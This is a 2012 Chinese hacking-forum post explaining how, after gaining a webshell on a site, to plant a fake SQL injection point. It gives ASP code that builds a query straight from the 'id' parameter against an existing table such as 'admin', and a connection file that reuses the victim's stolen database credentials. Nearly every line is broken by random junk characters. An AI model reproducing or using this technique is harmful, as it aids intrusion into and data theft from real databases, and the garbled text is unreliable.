中国网络渗透测试联盟

标题: 自己构造注入点方便入侵 [打印本页]

作者: admin    时间: 2012-9-13 17:27
标题: 自己构造注入点方便入侵
自己构造注入点方便入侵
) c. k7 k* W" F/ a, E$ I/ ]3 u& `( V+ U% I! q5 {3 J
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息, j! a  J/ i5 q, X

& f% }, p9 E, Q; K) k$ a& o# u这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!) O4 i# C5 S: X# Z# n
9 Y9 Q1 J) P2 M4 |. ^  N' o2 [1 v, l8 }
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
2 m. ^- S8 M& p% ]% l# I
! }% h! K1 Z4 ?. J" J密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表1 M$ b8 z8 ^9 f
' t! g! h5 g# `% r
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
! l6 Y. {2 v2 T" F- H
9 |2 D6 E5 }9 e$ _, h9 l程序代码
3 E- X% [+ d; N/ C<!--#include file="xx.asp"-->
+ F9 Z7 J3 l0 L6 f& D# X<%; h0 C$ W) U) k9 C$ P# ]- W
set rs=server.createobject("ADODB.recordset")$ i& L' o* D% }. L
id = request("id")
6 G' Z$ u$ x2 A, j8 A! i* v( RstrSQL = "select * from admin where id=" & id7 P( h8 k9 N: p  y* m, @: ~0 Y
rs.open strSQL,conn,1,37 D( P( }& Q9 c8 B7 U& A* G( T' N0 M
rs.close
( f* K" G' C5 K+ a%># S' E, Y  F- k8 |5 W
' n* @$ T" b/ p2 d0 ]  s1 e8 k
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
3 s1 I/ F- j9 K; O( s; R! z4 g  m5 V  T' ^
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!0 o/ V$ u% f  ~1 O. B# a9 g
; N% t" k$ |- G" G# a
然后就要构造一个连接数据库的文件了,代码如下:
, J: p1 o! x0 R程序代码
! q5 l& p/ _$ r: |" G<%        
, ]) g1 b% u& M; c+ E6 z7 ?strSQLServerName = "000.000.000.000"     '服务器名称或地址
5 F  T( l4 A# a6 I2 T* gstrSQLDBUserName = "sqlname"         '数据库帐号' E' A+ R1 G$ ?+ |* }2 A- I' y
strSQLDBPassword = "sqlpass"         '数据库密码
8 m. `- v3 R+ m$ b: cstrSQLDBName = "sqldataname"           '数据库名称! L8 ?) E$ z" R
Set conn = Server.CreateObject("ADODB.Connection")* {: D8 P0 `  v$ B% `
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"% E& m5 [1 X* e
conn.open strCon
7 m  S5 ^, G* R4 ~7 {; k%>
1 t4 s( _/ K2 s5 U1 ?" U8 r. G5 e* `* z
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,5 Q7 {) O- S4 _9 t' s# G# L
4 y2 ?7 F, O# O3 t- j; n$ ?. N
就这样,正常情况下,就OK了,伪造成功……
, V5 b) }0 O8 K4 s# t% Z1 [+ ?  {# g6 N! b& s8 a4 p4 ?7 ?4 _
           如果有什么问题可以提出来大家一起探讨解决。




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2